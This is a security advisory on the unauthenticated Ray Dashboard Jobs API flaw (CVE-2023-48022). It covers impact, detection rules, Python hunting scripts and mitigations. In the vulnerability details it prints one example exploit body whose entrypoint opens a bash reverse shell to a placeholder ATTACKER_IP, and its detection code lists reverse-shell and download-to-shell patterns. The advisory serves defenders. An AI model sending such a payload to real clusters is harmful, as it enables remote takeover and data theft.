Critical RCE Flaw in Ray AI Framework Actively Exploited After PoC Release

Executive Summary

A critical remote code execution (RCE) vulnerability, tracked as CVE-2023-48022 with a CVSS score of 9.8, has been disclosed in Ray, a popular open-source framework for scaling AI and Python applications. The vulnerability stems from the Ray Dashboard's Jobs API, which does not require authentication in its default configuration. Any unauthenticated attacker who can reach the dashboard can submit jobs remotely and execute arbitrary code with the privileges of the account running Ray.

The risk has been significantly amplified by the public release of a proof-of-concept (PoC) exploit, making it trivial for malicious actors to scan for and compromise vulnerable servers. Security scanning services like Shodan have identified over 1,700 internet-exposed Ray instances, putting valuable AI/ML infrastructure, sensitive training data, and computational resources at immediate risk. The framework's developer, Anyscale, has released a patch in version 2.7.0. All organizations using Ray versions 2.6.3 and earlier are strongly advised to upgrade immediately or apply the recommended mitigations to prevent a compromise.

Vulnerability Details

The core of CVE-2023-48022 is missing authentication on the Ray Dashboard's Jobs API. By default, Ray clusters do not enforce authentication, so the dashboard and its powerful API are exposed to anyone with network access. An attacker exploits this by sending a single HTTP POST request to the /api/jobs/ endpoint on the Ray Dashboard's default port, 8265.

The request body is a JSON payload that defines a new job. Its key field is entrypoint, the shell command that Ray executes for the job on the cluster's head node. Setting entrypoint to a malicious command (e.g., a reverse shell) gives the attacker remote code execution.

An example exploitation payload looks like this:

```
{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'",
  "runtime_env": {}
}
```

Upon receiving this request, the cluster's Job Supervisor runs the entrypoint command with the privileges of the Ray process, giving the attacker control of the node. Exploitation requires no user interaction and no prior authentication, which makes the vulnerability both critical and easy to exploit.
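To triage captured request bodies like the one above, defenders can check the entrypoint field against common reverse-shell and download-and-execute patterns. The Python sketch below is one way to do that; the function name `suspicious_entrypoint` and the pattern list are illustrative assumptions, not a complete signature set, and benign jobs can also match.

```python
import json
import re

# Illustrative indicator patterns (assumed, not exhaustive); tune for your environment.
SUSPICIOUS_PATTERNS = [
    re.compile(r"/dev/tcp/"),                              # bash reverse-shell redirection
    re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),    # download piped into a shell
    re.compile(r"\bbase64\s+(?:-d|--decode)\b"),           # decoding an embedded payload
    re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s"),         # netcat launching a program
    re.compile(r"\bbash\s+-i\b"),                          # interactive bash
]


def suspicious_entrypoint(body: str) -> list[str]:
    """Return the patterns matched by the `entrypoint` of a Jobs API request body.

    `body` is the raw JSON body of a POST to /api/jobs/. Malformed JSON or a
    missing or non-string entrypoint yields an empty list.
    """
    try:
        job = json.loads(body)
    except json.JSONDecodeError:
        return []
    entrypoint = job.get("entrypoint") if isinstance(job, dict) else None
    if not isinstance(entrypoint, str):
        return []
    return [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(entrypoint)]
```

Applied to the example payload above, it reports the /dev/tcp/ redirection and the interactive bash invocation, while an ordinary entrypoint such as `python train.py` returns an empty list.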

Affected Systems

Product: Ray, an open-source unified framework for scaling AI and Python applications.
Affected Versions: All Ray versions up to and including 2.6.3.
Patched Versions: Ray 2.7.0 and later.

Any server or cluster running a vulnerable version of Ray with its dashboard port (8265/TCP) exposed to untrusted networks is at risk. This is particularly dangerous in cloud environments where misconfigured security groups can inadvertently expose the service to the public internet.

Exploitation Status

A proof-of-concept (PoC) exploit for CVE-2023-48022 was publicly released shortly after the vulnerability was disclosed. This has lowered the barrier to entry for attackers, and active scanning for vulnerable instances is expected. A simple Shodan query, `"Ray" http.title:"Ray Dashboard"`, returns over 1,700 publicly accessible Ray Dashboards; any of them running an unpatched version should be presumed vulnerable. Given the value of the underlying computational resources, these systems are prime targets for cryptojacking groups and other threat actors seeking to build botnets or steal proprietary data and AI models.

Impact Assessment

Successful exploitation of CVE-2023-48022 grants an attacker complete control over the Ray cluster, leading to severe business impacts:

Data and Model Theft: Attackers can exfiltrate sensitive training data, proprietary datasets, and trained AI/ML models, resulting in significant intellectual property loss.
Resource Hijacking: The high-performance compute nodes in AI/ML clusters are attractive targets for cryptomining operations (T1496 - Resource Hijacking). This can lead to exorbitant cloud service bills and degradation of legitimate services.
Ransomware and Data Destruction: An attacker could encrypt all data and models on the cluster and demand a ransom for their release.
Pivot Point for Lateral Movement: Once the Ray cluster is compromised, it can serve as a powerful beachhead within the victim's network, allowing the attacker to move laterally to other corporate systems.

Compromised AI/ML infrastructure puts more than compute at risk. The training data and models stored on these clusters can be among an organization's most valuable intellectual property, so their theft or destruction can cause severe and lasting damage.

Cyber Observables for Detection

Security teams should proactively hunt for signs of vulnerability and exploitation using the following observables:

| Type | Value | Description |
|---|---|---|
| URL Pattern | `/api/jobs/` | Look for POST requests to this endpoint in web server or reverse proxy logs. Legitimate use may exist, but traffic from untrusted sources is highly suspicious. |
| Network Port | `8265/TCP` | The default port for the Ray Dashboard. Investigate any inbound traffic to this port from the internet immediately. |
| Process Execution | Descendants of Ray processes (e.g., `dashboard.py` or the worker that supervises submitted jobs) | Monitor for suspicious child processes (e.g., `sh`, `bash`, `curl`, `wget`) spawned by Ray processes. |
| Log Source | `dashboard.log`, `dashboard_agent.log` | Review Ray's internal logs for job submissions with unusual `entrypoint` commands or from unexpected sources. |
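The process-execution observable can be checked against a process snapshot. The Python sketch below is one hedged way to do it: it assumes process records (PID, parent PID, executable name, command line) exported from an EDR tool or similar, and the hypothetical `Proc` type, the function name, and the Ray marker strings (including the `ray::` worker-title prefix) are assumptions to verify against your own hosts. Because a job's entrypoint may be launched by a Ray worker process rather than directly by `dashboard.py`, the sketch walks each process's full ancestry instead of checking only the immediate parent.

```python
from dataclasses import dataclass


# Hypothetical process record; populate from an EDR export or process snapshot.
@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str      # executable name, e.g. "bash"
    cmdline: str   # full command line


# Assumed markers for Ray processes: names from the observables above plus the
# "ray::" prefix Ray uses for worker process titles (verify on your hosts).
RAY_MARKERS = ("dashboard.py", "ray.dashboard.agent", "ray::")
# Tools commonly launched by reverse shells and droppers.
SUSPICIOUS_NAMES = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat"}


def suspicious_ray_descendants(procs: list[Proc]) -> list[Proc]:
    """Return shell/download processes that have a Ray process among their ancestors."""
    by_pid = {p.pid: p for p in procs}
    flagged = []
    for proc in procs:
        if proc.name not in SUSPICIOUS_NAMES:
            continue
        seen: set[int] = set()
        parent = by_pid.get(proc.ppid)
        # Walk up the ancestry; `seen` guards against cycles in inconsistent data.
        while parent is not None and parent.pid not in seen:
            seen.add(parent.pid)
            if any(marker in parent.cmdline for marker in RAY_MARKERS):
                flagged.append(proc)
                break
            parent = by_pid.get(parent.ppid)
    return flagged
```

Expect some false positives: legitimate jobs can invoke shells too, so treat matches as leads for review rather than confirmed compromise.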

Detection & Response

Defenders should implement the following detection and response strategies:

Asset Discovery: Immediately scan internal and external networks for systems running the Ray Dashboard on port 8265. Use vulnerability scanners or tools like nmap and Shodan to identify all exposed instances.
Log Analysis & Monitoring (D3-NTA: Network Traffic Analysis):
- In your SIEM or web log aggregator, create detection rules for HTTP POST requests to the /api/jobs/ URI path.
- Alert on any connections to port 8265 from external IP addresses or internal segments that should not have access.
- Use Endpoint Detection and Response (EDR) to monitor for anomalous process creation by Ray processes. A rule could look for ray.dashboard.agent, dashboard.py, or the Ray worker process that supervises submitted jobs spawning shell processes.
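```
# Example SIEM rule logic (Sigma-style; map field names to your log schema)
title: Possible Ray RCE Exploitation (CVE-2023-48022)
status: experimental
description: Detects POST requests to the Ray Jobs API from sources outside a trusted allow-list.
detection:
  selection:
    http_method: 'POST'
    url_path|startswith: '/api/jobs'   # matches /api/jobs and /api/jobs/
    destination_port: 8265
  filter_trusted:
    source_ip|cidr:
      - '10.0.0.0/8'   # placeholder: replace with your trusted management/VPN ranges
  condition: selection and not filter_trusted
level: high
```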
Threat Hunting:
- Proactively search for systems with port 8265 open to the internet.
- Hunt for suspicious commands in entrypoint fields within Ray's job submission logs.
- Look for evidence of resource hijacking, such as sustained high CPU usage on cluster nodes that does not correlate with legitimate workloads.
Incident Response: If a compromise is suspected, immediately isolate the affected Ray cluster from the network to prevent lateral movement. Preserve logs and system images for forensic analysis. Terminate any suspicious running jobs and hunt for persistence mechanisms.
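The SIEM rule logic above can also be applied retroactively to reverse-proxy access logs during an investigation. The following Python sketch assumes NGINX/Apache combined-format log lines from a proxy that fronts the Ray Dashboard, and uses a hypothetical `TRUSTED` allow-list and function name; it reports POST requests to the Jobs API from any source outside that list.

```python
import ipaddress
import re

# Matches the start of an NGINX/Apache "combined" access-log line, e.g.
# 203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /api/jobs/ HTTP/1.1" 200 52 "-" "curl/8.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*"'
)

# Hypothetical allow-list: replace with your management network / VPN ranges.
TRUSTED = [ipaddress.ip_network("10.20.0.0/16")]


def untrusted_job_submissions(lines: list[str]) -> list[tuple[str, str]]:
    """Return (source_ip, path) for each Jobs API POST from outside TRUSTED."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith("/api/jobs"):
            continue
        try:
            src = ipaddress.ip_address(m["ip"])
        except ValueError:
            continue  # hostname or malformed source field; skipped, not flagged
        # An IPv6 source is never "in" an IPv4 network, so it is flagged.
        if not any(src in net for net in TRUSTED):
            hits.append((str(src), m["path"]))
    return hits
```

Non-IP source fields (for example, logged hostnames) are skipped rather than flagged, so confirm that your proxy logs client IP addresses.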

Mitigation

Organizations must take immediate action to mitigate this vulnerability. Remediation should be prioritized as follows:

Patch (D3-SU: Software Update): The most effective solution is to upgrade all Ray instances to version 2.7.0 or newer. This version addresses the vulnerability by introducing authentication and better default security configurations.
Network Isolation (D3-NI: Network Isolation): If patching is not immediately possible, restrict access to the Ray Dashboard port (8265). Use a firewall, security group, or reverse proxy to ensure that only trusted IP addresses (such as from an internal management network or VPN) can connect to the dashboard.

CRITICAL: Under no circumstances should the Ray Dashboard be exposed to the public internet.
Configuration Hardening (D3-ACH: Application Configuration Hardening): When starting a Ray cluster, bind the Ray Dashboard to the loopback interface so that it does not listen on external network interfaces. With the ray start CLI this is done with the --dashboard-host=127.0.0.1 option; the dashboard_host argument of ray.init() is the Python equivalent. This ensures the dashboard is only accessible from the machine it is running on.
Audit and Verification: After applying mitigations, use a port scanner or external service to verify that port 8265 is no longer accessible from untrusted networks. Regularly audit cloud security group configurations to prevent accidental exposure in the future.
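The verification step can be scripted with a plain TCP connection test. This Python sketch, with hypothetical function names, only checks whether each host accepts connections on the dashboard port; run it from a vantage point outside the trusted network, since a check from inside will naturally succeed.

```python
import socket


def dashboard_reachable(host: str, port: int = 8265, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within `timeout` seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable, DNS failure, ...
        return False


def audit_hosts(hosts: list[str], port: int = 8265) -> list[str]:
    """Return the subset of `hosts` on which the dashboard port accepts connections."""
    return [h for h in hosts if dashboard_reachable(h, port)]
```

For example, `audit_hosts(["ray-head.example.internal"])` (a placeholder hostname) returns the hosts that still accept connections. An open port shows reachability, not that the listener is Ray, so follow up on any hit.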

To detect active exploitation attempts against Ray clusters, implement Network Traffic Analysis focused on the Ray Dashboard. Configure network monitoring tools, web application firewalls (WAF), or SIEM solutions to specifically inspect traffic destined for port 8265. Create a high-priority alert that triggers on any HTTP POST request to the /api/jobs/ URL path originating from an untrusted or external IP address. While legitimate job submissions use this endpoint, they should only come from known, internal systems. Correlate network data with threat intelligence feeds to block known malicious IPs. Furthermore, establish a baseline for normal traffic patterns to and from your Ray clusters. Monitor for anomalous data flows, such as large egress transfers to unusual destinations, which could indicate data exfiltration following a compromise. This detection strategy provides an opportunity to identify and respond to an attack in its early stages, even before a full compromise is achieved.
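The egress baseline described above can start as simple per-host statistics. This Python sketch flags a host when its egress volume for the current interval exceeds the baseline mean by more than `k` standard deviations; the threshold rule, the default `k=3.0`, the function name, and the input shape (historical byte counts per host) are illustrative assumptions, and production network traffic analysis tools use richer models.

```python
import statistics


def egress_anomalies(
    baseline: dict[str, list[float]],
    current: dict[str, float],
    k: float = 3.0,
    min_bytes: float = 0.0,
) -> dict[str, float]:
    """Flag hosts whose current egress exceeds mean + k * stdev of their baseline.

    baseline: host -> historical egress byte counts, one per interval.
    current:  host -> egress byte count for the interval under review.
    min_bytes: absolute floor, so tiny but "unusual" transfers are ignored.
    """
    flagged = {}
    for host, observed in current.items():
        history = baseline.get(host, [])
        if len(history) < 2:
            continue  # too little history to estimate spread; handle separately
        threshold = statistics.fmean(history) + k * statistics.stdev(history)
        if observed > max(threshold, min_bytes):
            flagged[host] = observed
    return flagged
```

Hosts with fewer than two historical samples are skipped, so new or rarely seen hosts need a separate rule.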

MITRE ATT&CK Techniques

- Exploit Public-Facing Application
- Python
- Exploitation for Privilege Escalation
- Resource Hijacking

MITRE ATT&CK Mitigations

- Update Software
- Limit Access to Resource Over Network
- Software Configuration
- Audit

D3FEND Defensive Countermeasures

- Software Update
- Network Isolation
- Network Traffic Analysis

Article Author

Jason Gomes
